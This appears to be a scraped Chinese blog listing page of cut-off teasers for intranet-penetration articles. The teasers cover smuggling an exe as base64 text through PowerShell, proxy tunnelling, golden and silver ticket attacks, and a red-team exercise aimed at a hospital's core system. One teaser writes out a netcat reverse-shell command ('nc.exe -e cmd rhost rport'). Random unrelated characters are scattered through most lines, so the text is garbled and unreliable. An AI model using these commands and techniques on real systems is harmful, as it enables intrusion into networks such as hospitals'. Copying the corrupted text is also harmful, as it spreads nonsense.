1肝谭、前言 有次發(fā)現(xiàn)這樣的一個(gè)情況顽铸,目標(biāo)云桌面不出網(wǎng)且不允許上傳文件但是可以復(fù)制文本八匠,于是便想著通過 PowerShell 將 exe 程序編碼成 base64 文本崎淳,將編碼后...
IP屬地:澳門
1肝谭、前言 有次發(fā)現(xiàn)這樣的一個(gè)情況顽铸,目標(biāo)云桌面不出網(wǎng)且不允許上傳文件但是可以復(fù)制文本八匠,于是便想著通過 PowerShell 將 exe 程序編碼成 base64 文本崎淳,將編碼后...
一掷漱、使用proxy實(shí)現(xiàn)內(nèi)網(wǎng)穿透 準(zhǔn)備 教程參考地址:https://snail007.github.io/goproxy/manual/zh/#/[https://snail...
票據(jù)傳遞攻擊 這里介紹域內(nèi)常用的兩種攻擊方式:黃金票據(jù)Golden ticket售貌、白銀票據(jù)SILVER TICKET 另外给猾,學(xué)習(xí)過Kerberos認(rèn)證過程的同學(xué)會(huì)更加容易的理...
https://github.com/StudioEtrange/socat-windows
內(nèi)網(wǎng)滲透之端口轉(zhuǎn)發(fā)網(wǎng)絡(luò)拓?fù)鋱D如下: 1、nc 1.1 反向連接 攻擊機(jī):nc -lvp port 靶機(jī)(windows):nc.exe -e cmd rhost rport 成功反彈shell...
前言 記錄之前參加演練的一次實(shí)戰(zhàn)過程。 演練目標(biāo) 拿下某醫(yī)院核心his權(quán)限 web打點(diǎn) 拿到目標(biāo)恒削,通過信息收集盡可能多的尋找目標(biāo)資產(chǎn)池颈,最終發(fā)現(xiàn)了存在漏洞的某系統(tǒng),通過該系統(tǒng)進(jìn)...